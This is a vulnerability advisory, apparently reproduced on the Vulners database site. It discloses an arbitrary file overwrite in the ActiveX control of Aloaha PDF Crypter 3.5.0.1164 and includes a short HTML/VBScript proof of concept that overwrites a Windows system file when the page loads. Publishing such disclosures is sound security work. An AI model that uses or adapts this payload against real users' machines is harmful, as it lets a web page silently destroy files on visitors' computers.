Vulners
Lucene search
Aloaha PDF Crypter 3.5.0.1164 File Overwrite
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
============================================================================================
TITLE:
============================================================================================
Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite
url: http://www.aloaha.com/
download: http://www.aloaha.com/download/aloaha_crypter.zip
author: shinnai (http://shinnai.altervista.org)
============================================================================================
FILE INFO:
============================================================================================
File: C:\WINDOWS\system32\vbCrypt.dll
InternalName: ebCrypt
OriginalFilename: ebCrypt.DLL
FileVersion: 2.0.0.2087
FileDescription: ebCrypt Main Module
Product: ebCrypt
ProductVersion: 2.0.0.2087
Language: English (United States)
MD5 hash: b262cb93c555c3c9604502d071a783ec
============================================================================================
ACTIVEX INFO:
============================================================================================
ProgID: EbCrypt.eb_c_PRNGenerator.1
GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}
Description: eb_c_PRNGenerator Class
Safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
============================================================================================
BUG:
============================================================================================
This activex contains the "SaveToFile" which could be used to overwite arbitrary files on
pc users.
============================================================================================
PROOF OF CONCEPT
============================================================================================
<html>
<object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>
<script language='vbscript'>
test.SaveToFile "c:\windows\_system.ini"
</script>
</html>
============================================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (MingW32)
iQIcBAEBAgAGBQJQ/6sFAAoJEJlK/ai8vywmSUUQAK38iSzcZ3JsD+Kskt1Zwvhc
hynADNu17uvlcaUoK7uFc8BwOkRT6XqlmJe6Gab02jPClkmaHRH0Oh8/Zxu8T5Y5
TsLrw7YgUFQDelS4zL7yxZIKofio3GVS55vo3JL1bJvKrANp99BYcQFX4t5539g9
l/kYf51QGhWXxEvYFlSpDZ8km8dCElLYTT47oFjXMFSpBHyodrU4MPh4FGLoN1XN
TLrYDOoTke+RXit/nzNKqbNzXIXmBVTBWfYdPLWwcc07Go4KR3tKGl1ELSCczHeg
PFWCbcJ18l56809afAviUUvrgb1g9WG9ZY5jMxXP1t5oqeeLJKfKhX0KipVtoBUa
dZZWJOLp6Mmi8VBzfkTu50jZy1B4EtUSTlmj5A2SKBQRM/0SSqZO1LjwE39fQ9gh
6avUHhPgV9OLqaWxVbNHy6RYBFYHlo46ytvIhgBDU0VPqwI50yyzrObxbRAhCD19
GjgSBtZqOJQ9sFwiXS+HHQcCt8ZR6pf09yWmxDr+1L7D4yKvq/Z2TsBuYKMUGazW
Xni6lxddI7LUN88LXlrV8cCoJ7R2gBe9Tg3nUBIDLpXM4hyeU1DTL0kFNATUk3P5
7xFde64BvKL2GAzEip8j9PuGhezfflIIhsxPHUEemOvsUctqXEQI8DtC0GkRaT3J
enDko6b3T5jOt6axrWGb
=H+Gh
-----END PGP SIGNATURE-----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jan 2013 00:00Current
0.3Low risk
Vulners AI Score0.3